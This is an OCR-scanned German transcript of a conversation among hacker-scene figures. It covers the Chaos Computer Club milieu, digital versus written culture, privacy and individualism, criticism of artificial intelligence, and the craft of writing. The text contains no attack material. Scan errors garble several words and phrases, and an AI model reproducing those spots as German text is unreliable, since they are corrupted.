Mundwinkel genauso wie einen Typen, wo du
sagen möchtest: Junge Union. ’Nen Typen, der
in elf Vereinen ist. ’Nen Typen wie Wau, wo du
glaubst, der kommt grade aus dem Dschungel,
sowas Waldschrathaftes. Vic, so ein Schmaler
Schneller, Ingeniöser, mit seinem Porsche.
Und dann noch so ein paar wilde Düsentriebs.
Und die sitzen alle traulich vordieser Maschine.
Der Haufen ist auch deshalb interessant, weil;
Wenn du eine Sache durchsprichst mit allen,
dann kriegst du ein derartiges Interessens¬
spektrum zusammen, eine derartig scharfe Ar¬
gumentationsanforderung, daß wirklich nur die
besten Gedanken und Argumente durchkom¬
men.
m; Aber wer selektiert denn? Das ist der Punkt.
p: Es gibt in bestimmten Situationen bestimmte
Leute, die selektieren. Jeder ist für sich ein
Entscheider, weil die Autorität relativ locker und
situationsbedingt im Club herumwandert.
m; Jetzt kann ich ja mal von mir her erklären,
weshalb wir überhaupt so viel über die Ge¬
schichte reden.
p: Das wundert mich schon längst. Ich wollte
eigentlich überhaupt nicht über Computer re¬
den.
m:Ja. Es geht jetzt nicht um Computer. Es geht
darum, daß ohne Zweifel die Leute in diesem
Bereich irgendwann in den nächsten fünf Jah¬
ren gesellschaftliche Verantwortung überneh¬
men werden, wollen, was auch immer. Kom¬
petente Gutachter werden. In welcher Form
auch. Sie werden wie heilige Kühe behandelt
und sind eigentlich von A bis Z, ich sag’s wieder;
Betrüger.
p; ’Ne heilige Kuh schmeißt das BKA nicht um
sechs Uhr morgens aus dem Bett.
m; Das ist die Partisanennummer, wo man dann
sagt: Ja, damals., und so.
p: Worüber wir reden, das sind alles verschie¬
dene Aspekte ein und desselben Gegenstands.
Du kannst auch sagen: Ein und desselben
Menschen. Diese verschiedenen Seelen, Ge¬
danken und Ansätze, die hat jeder drin. Die
romantische Ecke auf der einen Seite. Dann
schnappst du wieder um in so einen wilden,
aufklärerischen Impetus und sagst: Hau weg
den Scheiß, oder sonstwas.
m: Ja, aber gewisse Freiräume, die gemacht
werden, und die etabliert werden - und zwar
durch die Praxis und sonst nix - und hingestellt
werden, existieren dann als Referenzen. Und
der ganze CCC und auch gewisse andere Leu¬
te - auch Sachen, die wir als Gruppe immer
gemacht haben -, sind als Referenzmodelle
möglich: Daß es auch anders geht. Irgendwann
ist ja der ganze Scheiß total zubetoniert.. .
p; Du bist soo negativ.
m: Sicher zubetoniert. Stimmt doch. Weil ich die
ganze Zeit immer neue Freiräume aufmachen
muß, wo eine gewisse Generosität oder eine
gewisses-verstehste, philosophisch gesehen
- Freidenkertum da ist und nicht ein Clubden¬
ken, ein kommerzielles Denken, ein Sekten¬
denken, oder eine philosophisch vorgefertigte
Schablonennummer.
p: Möglicherweise ist es so.. Du bistja immer im
-ü-
Fronteinsatz, und meine Art zu arbeiten und zu
wirken ist anders, nämlich mit dem Schreiben.
Du stehst jedesmal vor einem Mysterium. Du
schreibst ein Buch, das wird verkauft, 10.000,
20.000 Stück, die verschwinden im Nichts. Du
weißt überhaupt nicht. . . du redest, wenn du
Glück hast, mit ein paar Leuten, die dein Buch
in die Hände gekriegt und gelesen haben. Der
Rest verschwindet und versickert. Du weißt
nicht, was du wirkst. Ob du wirkst. Ob du jetzt
nur was wie ein Papiertaschentuch gemacht
hast, reinschneuzen, weg. . . Und ich weiß
auch, ich muß jeden Tag mein Glaubensbe¬
kenntnis ablegen und mir sagen: Ich weiß, daß
es mit Sprache geht. Es ist ein virulentes Ar¬
beiten. Es hat nicht so eine Unmittelbarkeit, wie
wenn du direkt im Raum arbeitest.
m: Es geht ja nicht nur direkt um Raum.
p: Vielleicht ist das ein berufsbedingter Opti¬
mismus, den ich hab.
m: Gut, du hast einen berufsbedingten Opti¬
mismus. Hast vielleicht im Delirium angefan¬
gen, hast ein paar Modelle dokumentiert. Ich
bin jetzt vollkommen subjektiv. 'Delirium’ jetzt
nicht negativ: Mit einer gewissen Ehrlichkeit.
Genauso wie die ganzen Chaosleute auch an¬
gefangen haben mit einer gewissen Ehrlichkeit:
Erzählen wir doch mal, was wirdenken, was wir
fühlen, wie abgefahren man ist, das ist lustig.
p: Delirium ist ok in der Hinsicht. Ich mach ein
Bild: Du kannst sagen - ich will das jetzt „nicht
überdramatisieren -, wir haben jetzt den Über¬
gang von der Eisenzeit in die Siliziumzeit. Und
du hast mit dem Delirium insofern recht, als
alles, was wir heute machen, was die Hacker
machen, auch wenn's einem so vorkommt, als
wär man eine Avantgarde, als wäre das das
neueste an HiTech, was es gibt, nix anderes
sind als Dinge, die simplen Höhlenkritzeleien
entsprechen. Der Computer hat im Augenblick
eine Roheit, das empfindet jeder, der längere
Zeit damit arbeitet. Es ist eigentlich eine Ver¬
gröberung, Verschlechterung, ein Rückschritt
gegenüber den Arbeitsweisen, die man bisher
gehabt hat. In vielerlei Hinsicht. Das ist ein
digitaler Faustkeil. Von daher: Delirium ok. Klei¬
nes Beispiel. Ich wollte mir neulich ein neues
Klingelschild für draußen an der Tür machen,
mit meinem Namen. Wenn ich noch eine
Schreibmaschine gehabt hätte, hätt’ ich einen
kleinen Zettel eingespannt und draufgetippt.
Bis ich das in meinem Matrixdrucker entspre¬
chend justiert habe, die Textverarbeitung ein¬
gerichtet, die Datei “Klingels.doc“ geschrieben,
abgespeichert und zum Druck aufgerufen ha¬
be, bin ich alt. Hab ich’s mit dem Filzstift ge¬
schrieben und mirgedacht: Wozu hab ich 3000
Mark für das System ausgegeben?
e: Das sind ja auch immer solche einmaligen
Geschichten. Du machst ja nicht jede Woche
ein neues Klingelschild.
p: Das war einfach eine Möglichkeit, die mir die
Schreibmaschine geboten hat, und die am
Computer weggefallen ist.
e: Das ist eine einmalige Verzögerung, aber
dadurch doch auch ’ne ständige Beschleuni¬
gung.
p: Du kannst sogar eine Ästhetik draus machen
Wie ist die Bauhaus-Asthetik entstanden'? Die
ist entstanden daraus, daß die damaligen Mö¬
belmaschinen nichts anderes konnten, als total
dumpfe, schlichte, rechtwinklige, unornamen-
fterte Dinge herzustellen in Serienproduktion
Genauso die ganzen Computerkrakeleien, wo
du i^rgendwelche wilden, groben Pixelkörneram
Bildschirm siehst.
m. Jetzt aber nicht abschweifen, sondern auf
den Punkt zurückzukommen. Daß z B von
einer oralen Gesellschaft - ich zitier jetzt kon
kret McLuhan: nämlich, daß die Schrift einiae«^
verändert hat. Und die Schrift auch, obwohl e?
kein Problem war, zu einem Machtprogramrn
wurde. Der Schreiber im Dorf etc.
p: Wir machen ja jetzt gerade den Versuch
überzugehen von der Schriftkultur in die digitale
Kultur. Ins digitale Alphabet, Null, Eins.
m: Richtig. Und die Vision der Veränderung der
digitalen Dings ist dir auch noch nicht klar. Und
ich arbeite jetzt an diesem Brainstormino
NICHT einer Feststellung von was möglich i^’
oder von irgendwelchen Stories, Anekdoten. ’
p: Ich bin durch die Gespräche in den letzten
Tagen ziemlich angekurbelt, weil wir einfach frei
phantasiert haben. Sachen durchgedacht ha¬
ben, ohne Rücksicht auf Verluste.
m: Mir geht’s jetzt nicht um Rücksicht auf Ver¬
luste. Mir gehts darum, die Sache noch weiter
zu treiben, Psycho-Hacking, Kochrezepte,
Minderheitenprogramm. Dann: Was ich immer
wichtiger finde, ist diese Realitäts-Geschichte.
Ich hab’ mittlerweile einfach drei Geschichten,
die von den Parametern so beeinflußbar sind,
daß - wenn du jetzt eine neue Generation von
Kindern aufziehen wirst, was die für einen Rea¬
litätsbegriff haben werden.
p: Wir haben ein dickes Problem hier in Europa,
oder in den westlichen Kulturen. Das ist mir
auch in Ägypten aufgegangen; nämlich den
Individualismus. Das ist ein sehr großes Pro¬
blem. Wenn du ein Individuum bist, brauchst du
ja eine Privat-Realität. Ich hab mich in Ägypten
mit einer jungen Koptin unterhalten, die war 24.
Arbeitet seit fünf Jahren als Tour Managerin für
ein Reisebüro. Vor drei Jahren ist sie zum
ersten Mal, weil jemand krank geworden ist,
nach Oberägypten gefahren mit einer Reise¬
gruppe. Zum ersten Mal aus Kairo weg. Da hats
erstmal wilde Schlachten mit ihrer Familie ge¬
geben. Ein unverheiratetes Mädchen, das die
Nacht nicht zuhause verbringt - das geht nicht.
Da hat sie riskiert, daß sie am Rande zum
Nutten-Ansehen steht. Mutter zweimal täglich
anrufen, Oberägypten ok. Dann ist sie nach
Oberägypten gefahren, mit der Gruppe auf ein
Schiff gegangen und hat als Tour Managerin
eine eigene Kabine bekommen und hat mir
gesagt: Dann, in der Kabine, war sie zum ersten
mal in ihrem Leben alleine in einem Zimmer.
Und sie isttotal ausgeflippt, weil sie nicht wußte,
was sie tun soll. Ob sie zusperren soll. Hatte
immer nur Angst, daß da jemand Fremder rein¬
kommt. Horror. Und dann ist mir klargeworden:
Es ist sinnlos, sich mit ihr über so einen Begriff
wie Privatleben’ zu unterhalten. Vollkommen
sinnlos. Weil ich erst mindestenstausend Jahre
europäischer Kulturgeschichte dazuerzählen
mü ßte. Ich brauch’ mindestens ein halbes Jahr,
bis ich ihr erklärt habe, was ich meine.
m: Das ist jetzt der Punkt. Das ist das, was ich
vorhin mit Tradition auch meinte. Daß z.B. da
noch gewisse Denkprozesse funktionieren und
sicher noch 30,40 Jahre funktionieren werden.
Und ich wiederhole, daß z.B. unsere Deso¬
rientierung der letzten Jahrzehnte, nämlich "Pri¬
vatisierung“, der Bedürfnisse, der Vorstellun¬
gen. ..
p: Du mußt die Leute privatisieren, wenn du
ihnen viele Produkte verkaufen willst. Du mußt
die Familie aufspalten, du mußt die Großfamilie
aufspalten. Eine Großfamilie kauft sich nur
einen Fernseher. Das sind 20 Leute, die in
einem Haus wohnen und alle in denselben
Fernseherstieren. Die mußt du erst aufspalten,
die Großeltern in eine Wohneinheit, die Eltern
in eine und die Kinder in eine, dann kannst du
schon drei Fernseher verkaufen.
m: Das ist aber nicht mein Problem. Wenn ich
z.B. zum Benjamin gehe, dann hat der seinen
Fernseher in seinem Zimmer, der andere hat
auch einen TV und dann haben sie noch einen
TV in der Küche. Und im Badezimmer auch
noch.
p: Ich weiß. Ich hab drei Computer hier liegen,
zwei Videorecorder. ..
m: Ich glaub, das Problem... Das Bewußtsein
des Privatlebens ist hier in Europa so entwic¬
kelt, daß das eben so funktioniert, während
man sich vor zehn Jahren noch gestritten hat:
Ich will Fußball sehen, und ich will aberdie Inge
Meysel sehen.
p: Mit den neuen digitalen Videorecorder
kannst du das machen. Zwei Programme auf
einem Bild.
m: Oder parallel aufnehmen, und das andere
Programm später gucken. Das ist aber jetzt im
Westen hier. Und das sind die dreißig Jahre
Vorschuß, und das sind die Geschichten, die,
wenn einersich wirklich drauf spezialisiert-und
da gehören wir wahrscheinlich auch mal dazu
-, als Navigator die Informationen in die richti¬
gen Kanäle zu verteilen und zu verdealen. Z.B.:
Ich geh nach Ägypten und in die Türkei und
checke, was die dort brauchen und hab die
richtigen Connections, muß nur meine Kartei
durchgucken, wer produziert was, was brau¬
chen die dort unten, welches Programm wird sie
interessieren. Bin ich die ganze Zeit. . . mit so
einem System wie “Infermental“ hab ich per-
manant 100 Leute im Kopf, weiß, wer was
benutzt. Hier in Hamburg hab ich schon fünf
Leuten Bescheid gesagt, direkt neue Infos ge¬
kriegt, komm’ dich einmal besuchen, hab’ neue
Infos. Hab’ das alles drin, als Navigator. Könnte
ich theoretisch verdealen. Wird auch verdealt
werden in Zukunft.
p: Du weißt ja auch, daß das mein Prinzip ist.
Deswegen hab ich hier mein aufblasbares Kaf¬
feehaus. Meine Audienzen.
e; Das ist ein Vonwurf gegen mich, den ich von
Benji eingefangen hab. So diese Navigator¬
geschichte: zwei Tage in Hamburg, fünf Woh¬
nungen an der Hand, und die gleich wieder
weitergeben, und Jobs...
n- Benjamin ist grade aus so einem Ge¬
schwindigkeitsverlauf wieder ausgestiegen.
Und das geht ihm zu schnell, das mag er nicht
im Augenblick.
m-Bemi kommt jetzt in eine Sache rein: weg von
der Maschine, nur noch Bodyfeeling, so m diese
Richtung. Menschliche Wärme, weißgottwas.
Diese ganze Geschichte. Ich möcht’ wieder
Natur haben. Ob jetzt positiv oder negativ, ist
mal außer acht gelassen. Der ist soweit rein-
qegangen mit den Computern - für sich “j
er da wieder Distanz haben muß. Es geht mir
aber nicht um Computer. Du hat jetzt mit dem
Individuum vorgegriffen. Ich wollte das mit der
Arbeit noch ausführen. Nämlich die Gras-
muck-Theorie. Die Arbeit ist vom Stolz her
abgeschrieben, bis vielleicht fünf Prozent, die
noch stolz sind auf ihre Arbeit..
p: Hier bei uns im Westen.
m' Da gehören teilweise noch gewisse Künstler
dazu. Ich rede jetzt vom Westen als der Avant¬
garde einer Informationsgesellschaft, und: Wie
sieht die gesunde Kultur einer westlichen Ge¬
sellschaft aus in Zukunft? Eine Kultur, wobench
glaube, daß die Bedingungen einer gesunden
Kultur mehrere sind, nämlich: ein gewisser so¬
zialer Code und gewisse soziale Grundsätze.
Jede gesunde Gesellschaft hat einen Freiraurn,
der frei von Gedanken ist, in Anführungszei¬
chen.
p: Konstruktive Hirnlosigkeit.
m: Ja, z.B. Meditation ist konstruktive Hirnlo-
siqkeit. Kirche, weißgottwas, Architektur, rrei-
räume. Früher war der Begriff Freiraum ai^
Land, Space, also Material bezogen. Heute im
Westen ist der Begriff Material immer mehr in
Zeit umgesetzt. Wechselt vom Geld zum Zeit¬
begriff.
p: Hast du eigentlich das Gefühl, daß die Hac¬
ker, oderdie Computerleute den Kampf um den
Raum schon aufgegeben haben?
m: Vorläufig haben sie ihn vergessen. Laß mich
jetzt mal ausreden. Die Geplänkel mit Raum,
die ganzen Computergames sind noch auf die¬
sem Raum-Kampf-System, Go, oder schach¬
mäßig aufgebaut. Das wird wechseln. Da hoffe
ich schon auf die Transputer. Obwohl dann die
Zeit-Geschichte - infinite CPU-time - wo, du
es verstanden hast, haben die Jungs - inter¬
essiert mich nicht mehr - nur aus Space ge¬
arbeitet. Wenn die Polizei auch immer noch auf
Space abfährt, und die Hacker auch, da wird i
nichts rauskommen. Das ist die totale Schi- •
zophrenie. Und trotzdem wird’s Partisanen wert :
kriegen, das ist das Gefährliche. Romantik. Das '
wird dann Fake.
p- Ich kann mit Romantikgut umgehen. Weil ich
ein Romantiker bin und immer wie ein Tier
gegensteuern muß beim Schreiben. Das gibt
auch eine ungeheure Produktivität.
m: Ja, die Romantik ist von der Poesie her eine
Geschichte. Aber da ist es nicht Poesie, son¬
dern inhaltliche Überbrückung einer Leere. Da
wird die Nostalgie und die Vergangenheit. . .
p: Das ist so ein Problem. Ich bin Romantiker,
aber ich hasse Romantik, vor allem, wenn ich
schreibe.
m: Wenn du Wau heute sagst: Du hast fünf
Jahre lang nicht nachgedacht, sondern nur
reagiert, dann überbrückt ein Wau das in zehn
Jahren, indem er sagt: Damals war das voller
Action. Und wenn du ihm sagst: Da ist gar nichts
gelaufen, dann kommt er mit Zeitungsartikeln
an, zeigt dir, was da gelaufen ist, macht Bla¬
blabla, was WIR damals geleistet haben, wir
sind ja damals verfolgt worden. Und dieser
ganze Kack, das ist gefährlich. Es geht um eine
gesellschaftliche Verantwortung. Das klingt
jetzt vielleicht vollkommen doof. Ich sag’: Wertn
wir uns als sowas sehen wie die Konstrukteure
oderdie Erhalter oder die Bewußtmachereiner
gewissen neuen westlichen Kultur - neuen
Kultur heißt einfach; die Entwicklung des indi¬
vidualistischen Begriffes in eine Kultur-, sind
wir auch verantwortlich, daß diese Kultur le¬
bensfähig wird und nicht No Future und deka¬
dent wird. Und eine Kultur braucht Freiraum
Dieser Freiraum hat früher Kirche, was hatteri
wir noch gesagt? - Hirnlosigkeit, Zen-Budd¬
hismus, weißgottwas, der aber - ob das jetzt
Zeit ist oder Raum, ist vorläufig noch egal -
einfach Garantie von gewissen Räumen hat
die steuermäßig von allen bewußt oder unbe¬
wußt bezahlt werden, aber als Dogma, als Ge¬
setz. . .
p; Das, wovon du redest, ist mein Hauptkritik¬
punkt am Entwurf von sowas wie Künstlicher
Intelligenz. Einen Entwurf vom Menschen zu
machen, der auf ein Ideal angelegt ist. Auf
Vollendung. Das sind so Dinge, die fange ich
langsam an als große Illusionen zu durch¬
schauen.
m: Es geht nicht um Vollendung.
p- Doch. Und zwar in einer Weise, die. . . |qu
muß den Begriff Vollendung nochmal bestirn-
men. Jetzt muß ich ein kleines bißchen aus-
holen: Ich bin kein großer Mathematiker, aber
überden Computer habe ich angefangen, mich
ein bißchen mit Geometrie zu beschäftigen,
weil’s interessant ist und weil ich ein visueller
Mensch bin. Man kann sich das immer gleich
anschauen, was man ausprobiert am Compu¬
ter. Dabei hab ich den Begriff “Euklidische Ge¬
ometrie“ zum ersten Mal verstanden. Das ist die
Lehre von idealen Grundelementen, aus denen
die Welt besteht; die gerade Linie, die ebene
Fläche, die kugelrunde Kugel. Ideal und Voll¬
kommenheit. Das sind die Urbilder in dieser
Geometrie, und das sind Formen, die findest du
nirgendwo in der Natur. Du findest nirgendwo in
der Natur eine gerade Linie, du findest nir¬
gendwo in der Natur eine vollkommen runde
Kugel.. .
m: . . .außer bei Kristallen und chemischen
Geschichten.
p: Und auch da ist es nicht vollkommen. Es gibt
immer mindestens sumikroskopische Fehler¬
haftigkeiten, Unreinheiten, Einschlüsse, Ver¬
schiebungen, Spielräume, Fluktuationen. Da
jetzt herzugehen und so einen statischen, clea-
nen Entwurf vom Menschen zu machen und
sowas wie Künstliche Intelligenz, wo alles, das
unrein ist und fluktuiert, was du eben mit Frei¬
raum bezeichnest, eliminiert und beseitigt ist,
das hat für mich nichts mit irgendwas, was ich
mir unter Ideal oder Vollendung vorstellen
könnte, zu tun.
m: Darum geht es ja in dem, was ich auszu¬
drücken versuche, nicht.
p; Das ist die Möglichkeit von Kultur: Vielfalt,
Vermischung, Diffusion, Intensitäten. . . Du
kannst z.B. auf elektronische Weise, wenn du
versuchst, ein Hirn zu simulieren - Transputer
sind ein genauso rohes Modell da, aber zum
ersten Mal in der zweiten Dimension, d.h. du
hast nur eine Ebene von Prozessoren nebe¬
neinander. Da ist noch gar kein Raum. Von
daher ist das immer noch dieselbe Höhlen¬
malerei. Und du hast mit elektrischem Strom
nur die Möglichkeit: an oder aus. Du hast nicht,
so wie die Signale im Kopf weitergeleitet wer¬
den nach dem, was man heute weiß, als che-
moelektrischer Prozeß. Mit diesem Prozeß
kannst du auch Intensitäten regeln, mit denen
Daten oder Informationen ankommen. Du
kannst streuen. Das kannst du mit einem elek¬
tronischen System nie machen. Oder nimm
einen Organsimus: das ist ja immerein rekur¬
sives System. Das bezieht sich immer wieder
auf sich selber. In der Künstlichen Intelligenz
bezieht sich Intelligenz immer nur auf ein chi¬
rurgisch freitheoretisiertes Stück vom Geist,
alles andere fehlt.
m: Halt. Ich nagel dich jetzt kurz fest. Emotio¬
nale Grundlage als Basis des Denkens. Da bin
ich nicht ganz einverstanden.
: Schau. Die Augen melden einen Zustand,
er Zustand wird übersetzt, also da zittert
irgendwas den Augennerv rein und das wird als
eine Organbefindlichkeit, und erstmal als Emo¬
tion wahrgenommen.
m: Nochmal Halt. Was du jetzt grade be¬
schreibst, ist Reaktion. Das ist: von au ßen nach
innen. Es gibt auch noch was anderes.
p: Aktion.
m: Du hast emotionale Grundlage nur als re¬
zeptive Geschichte gesehen, und ich geh da¬
von aus, daß ein menschliches Wesen... daß
es ein paar Basiswerte, die, abgesehen von der
elektrischen Mechanik z.B. im Computer
101010 sein könnte, sowas wie Grundwerte in
der Urzelle oder in der Gen-Geschichte drin
sind, wie Triebe oder vorgegebene Emotionen
drin sind. Egal, ob da eine Reaktion von drau¬
ßen da ist oder nicht. Genauso wie ich denke,
in dem Molekül Mensch sind gewisse Basisin¬
formationen drin, die vollkommen selbstständig
funktionieren. Ob da was rein- oder rausgeht,
ist vollkommen egal..
p:.. .das Betriebssystem. Die DNS.
m: Genau. Nicht nur Betriebssystem. Denn ob
es gebraucht wird oder nicht, ist eine andere
Frage. Und da geh’ ich weiter, daß das z.B.
gesellschaftlich gesehen auch so ist. Und daß
da ein paar Basisgeschichten drin sein müssen,
daß, was ich vorher angedeutet habe, ein ge¬
wisser Denkfreiraum dasein muß, daß ein Mo¬
ralbegriff dasein muß, und der Moralbegriff ist
eine Sprachgeschichte. Eben nicht nur zu rea¬
gieren auf alles, was auf mich einstürzt und die
volle Paranoia zu kriegen. . .
m: Das ist mir aber wieder zu einfach.
n- Du mußt irgendwo anfangen. Klar ist das
einfach, aber ich war schon froh, daß >ch dahin
gekommen bin. Einfach daß du eine Nivellie¬
rung ziehst durch alles, ob das ein Flupeu-
gabsturz ist oder in Äthipoien wieder Leute
vGrhunoGrn. WGnn ich dss im TV SGhG und nicht
darauf reagiere, das nicht unmittelbar in eine
Handlung umsetze - ob eine symbolische oder
eine körperliche in eine Tat, dann ist es für
mich Unterhaltung. Wenn ich es nur wahrneh¬
me Wenn ich anfange und eine Entscheidung
treffe und sage; Das ist jetzt eine Information,
die ist für mich verbindlich, weil ich feststelle, da
passiert was, dann ist es keine Unterhaltung.
Das ist dann Information.
m- Wenn du jetzt von deinem Trip, von deinem
Ritual aus entscheidest, nur auf Blau zu rea¬
gieren; dann kannst du dich vollkommen künst¬
lich darauf trainieren, nur auf Blau zu reagieren
und alles andere zu ignorieren. Der Mensch ist
von seiner Rezeptionsfähigkeit her fähig, bis
Auschwitz - das nehm ich als Ertragungs¬
grenze - sich vollkommen zu spezialisieren,
wenn er will. Aber nicht für immer.
p; Aber ich habe angesichts der Medienrealität
es unheimlich nötig, eine Kontrollinstanz zu
haben. Ich hab’ die Kopf-Intelligenz und ich
hab’ die Körper-Intelligenz, und ich habe ein
unheimliches Vertrauen in die Intelligenz mei¬
nes Körpers. Ich mache mal eine paradoxe
Formulierung; Die Art und Weise wie der Kö rper
denkt das nennt man Gefühle. Das ist für mich
eine Kontrollinstanz gegenüber der Kopf-In¬
telligenz. Und das, was die Körper-Intelligenz
erzeugt, sind Gefühle. Ich hab in der Zwi¬
schenzeit wieder gelernt, grade angesichts
elektronischer Medien und des Computers,
mich sehrsehr fein auf meine Gefühle zu ver¬
lassen bzw. Gefühle zu präzisieren, und die
dann auch genau zu beschreiben versuchen,
als eine Basis.
m; Das ist ja viel komplizierter als du denkst,
p; Selbstverständlich.
m; Schon bei der Kopfintelligenz spaltet sich
das in Simulacra, Simulation und Realismus,
schon wenn du nur fernsiehst.
p; Dann hab ich den Begriff Simulacra falsch
verstanden.
m; Du kannst vom Simulacra etwas nach¬
empfinden, das du im TV siehst, wenn du
irgendeine Information in deinem Kopf ge¬
speichert hast, die ein Aha oder Deja-vue er¬
zeugt von einer Geschichte, die du schon mit¬
erlebt hast und nur das Visuelle..
p; Warum soll ich mich nicht über ein Gum-
mi-Nilperd freuen, das irgendwo in Disneyland
rumschwimmt?
m; Aber du produzierst dann eine Information,
die Simulacrain deinem Kopf wird. Auch wenn’s
nicht stimmt. Und dann entsteht Mediamystik.
D.h. ohne daß du’s willst, nimmst du assoziativ
Bilder im TV auf, wo du z.B. nur auf Blau
reagierst, weil du blaue Bilder gemalt hast. Und
dann kriegt ein blaues Bild, das eine vollkom¬
men andere Realität oder einen anderen Sinn
im TV hat, und theoretisch in Zukunft auf jedem
Rechner, kriegt für dich über diese Assozia¬
tionsgeschichte einen vollkommen neuen ei¬
genen Wert.
p: Das ist die Interpretationsfreiheit, die ich
vorhin mal erwäht habe.
m; Richtig.
p: Die Herrschenden können nicht mehr kon¬
trollieren, wie die Nachrichten interpretiert wer¬
den.
m; Das mein’ ich ja jetzt. Und das meinte ich
auch vorhin; Was passiert mit einer Generation
von Leuten, die nur mit einem Realitätsbegriff
aufwachsen, zwischen eigener Realität- ingj.
vidualismus-, einer Macht-Realität, die ihnen
aufgezwungen wird - z.B. Hausdurchsuchung,
Arbeit, ein Simulacrabegriff, den sie überhaupt
nicht mehr kontrollieren und Sachen, die
deklariert Simulation sind? Das sind schon ein¬
iges an Realitäten.
p; Man möchte meinen, daß es langsam Zeit
wird, daß die Transputer kommen. Daß wir
langsam lernen, auch parallel die Realitäten zu
verarbeiten.
m; Die Steigerung der Schizophrenie oder der
Psychopathie wird SO hart ansteigen und die
Ausfälle, die es geben wird, werden SO hart
sein.
p; Ich mach manchmal Gedankenspiele, aber
ich kann mir nicht andeutungsweise vorstellen,
wie das gehen soll, parallel zu denken. Ich
glaube trotzdem daran, daß man das trainieren
kann. Ich mach andere Arten von Training. Z.B.
machesmal beim Arbeiten, nachdem ich be¬
merkt habe, daß es keine Droge gibt, die mir
beim Arbeiten irgendwie förderlich ist - das ist
alles Illusion, sowohl LSD als auch Koks, da bist
du im Zustand der Euphorisierung der Ansicht,
daß du was Geniales geschrieben hast, und
wenn du dann wieder nüchter bist und du liest
das, dann hast du ziemlich heiße Luft ge¬
schrieben. Jetzt such ich aber immer Möglich¬
keiten, die Intensität ganz nach oben zu fahren.
Einerseits hab ich diese erotischen Sachen
gemacht, ganz alte Situation: Der Maler und
sein Modell. Nur hab ich nicht gemalt, sondern
geschrieben. Und das ist eine Sache, die mach’
ich schon lange. Das andere ist, daß ich mir
manchmal eine Frontaltherapie geb’: Da schal¬
te ich den Fernseher ein ohne Ton, dann mache
ich Musik dazu und dann kann ich das schon
ziemlich fein dosieren, die Reizschwelle, den
Ansturm, der kommt. Ziemlich hochfahren bis
zu einem Pegel, wo ich genau merke: jetzt hab
ich auf der einen Seite einen unheimlichen
inneren Widerstand aufgebaut, der diesen An¬
sturm von mir fernhält, weil ich mich konzen¬
trieren will und schreiben. Und diesen Wider¬
stand aufzubauen, das ist - mit ein bißchen
Training - unheimlich konstruktiv: dazu
brauchst du Kraft, und diese Kraft, die man
dabei freisetzt, die kannst du produktiv auch
für’s Arbeiten venvenden.
m: Das ist der heilige Antonius, die Geschichte.
p: Das ist kein heiliger Antonius. Das ist wie
schwarzer Kaffee.
m: Der heilige Antonius, der drei Nächte ge¬
schrieben hat und gebetet hat und die Teufel
tanzen um ihn ’rum.
p: Ach so.
m: Das ist auch das Stück “Wirrkopf“, was wir
in Graz gemacht haben. (..) Wenn es auf Ent¬
ertainment rausläuft - da ist vielleicht deine
Theorie von Information und Unterhaltung ganz
wichtig - wenn die Leute nämlich alles als
Unterhaltung ansehen, was ja auch Gefahren
nach sich zieht - die Pop-Welt -, dann ist es für
sie kein Problem, und dann werden sie nicht
verrückt. Oder sie werden erst später verrückt.
(-)
p: Das ist ein Problem, das kenn ich vom
Schreiben. Wenn du lernst zu schreiben, dann
- ich hab mit vielen Kollegen schon darüber
geredet - da fängt jeder kleine Schriftsteller
erstmal an zu trainieren. Das sind ein paar
Jahre, wo man sich auf die eine oder andere
Weise in Details verliert. Du lernst, genau zu
beobachten und du lernst, mit Sprache zu rea¬
gieren auf Dinge, d.h. du siehst was, du eriebst
es fertig, aber schon etwas dezidierter, und
dann machst du eine Formulierung daraus und
präzisierst eine bestimmte Sache. Da hab ich
auch hunderte von Seiten zuhaus gehabt, mit
so kleinen Splittern. Für sich genommen wun¬
derbar. Immer so ein Miniatur-Universum, mit
so einem kathedralischen Gefühl, diese Ruhe,
wenn man auf etwas einen zweiten Blick wirft
und diese eigenen Räume, die man da auf¬
spannen kann, auseinereigenen Sprache. Und
nichts paßt zusammen. Es ist ein riesiger
Schrotthaufen, und du kannst keine Ge¬
schichten schreiben. Du schreibst immer nur
Splitter, bist gleichzeitig so einem Authentizi¬
tätszwang verpflichtet. Nur die Wahrheit! Ich
kann da nicht einfach noch einen Satz dazu¬
schreiben, das ist nicht wirklich passiert. Auch
so ein Realitätsproblem. Der Mut, Fiktion zu
machen, das ist für viele Leute schon ein rich¬
tiger Schritt. Das ist bei mir dann wieder um¬
geschlagen. Ich hab das soweit getrieben, bis
ich fast autistisch war. Also, wo ich rumgelaufen
bin ganz hochspezialisiert in der Reaktion auf
Sprache..
m:.. .alles Blau.. .
p: . . .daß ich mich total gestört gefühlt habe,
wenn mich irgendwer angesprochen hat. Muß
ich noch dazusagen, weil ich da noch in Öster¬
reich war: In Österreich wird Mundart gespro¬
chen, Dialekt. Ich habe mir aber beigebracht,
Hochdeutsch zu denken. Jetzt ist das dann so:
Du machst eine Wahrnehmung. Dann siehst du
einen weissen Radiergummi, auf dem ein Ho¬
nigtropfen liegt und glänzt. Da machst du einen
I
Satz draus. Das bedeutet dir wahnsinnig v^t.
Da klingt Musik, das ist die Welt im Kleinen, die
die Welt im Großen zeigt. Dann triffst du je¬
manden, den du kennst, und er erzählt m
irgendwas, öderer fragt dich, wie s dir geht, und
du denkst dir, du kannst ihn jetzt nicht anlacheln
und ihm sagen: Auf einem Radiergumrni g anz-
te ein Honigtropfen. Das ist nicht direkt kom¬
munizierbar. Das ist schon im Zeremoniell der
Literatur und ist für die direkte Kommunikation
nicht mehr geeignet. Diese Form von dem, was
ich damals für Literatur gehalten hab. Ann En¬
de, da hab ich eine Liebesgeschichte gehabt,
und ich bin manchesmal auf der Bettkante
gesessen, nachdem wir gevögelt haben - wir
haben uns wunderbar verstanden, es war ein
harmonisches Verhältnis —, und ich hab mir
gedacht: Wann ist unsere Liebesgeschichte
endlich zuende, damit ich die Geschichte davon
schreiben kann. Weil: eine Geschichte braucht
einen Anfang und ein Ende. Die Literatur hat
sozusagen gefordert, daß diese Geschichte
zuende geht, weil ich schon ungeduldig ge¬
worden bin. Ich wollte die Geschichte schrei¬
ben. Ich bin fast verrückt geworden dabei. Da
mußt du dann langsam in die richtigen Di¬
mensionen hineinfinden.
m- Die Dimension ist. . . es gibt da zwei Ten¬
denzen, glaub ich, generell, in der individual-
stischen Gesellschaft. Die eine ist ©''st s®jt ein
paar Jahren, das sieht man auch an der Wer¬
bung: Jeder soll mal Urlaub machen. Freizeit.
Ein neuer Pluralismus kommt jetzt rem. Jeder
darf machen, kann machen, was er will. Die
echte Demokratie..
(Mike macht eine Schachtel Zigaretten sorg¬
fältig auf)
p: Man merkt, daß du mal im nichteuropäischen
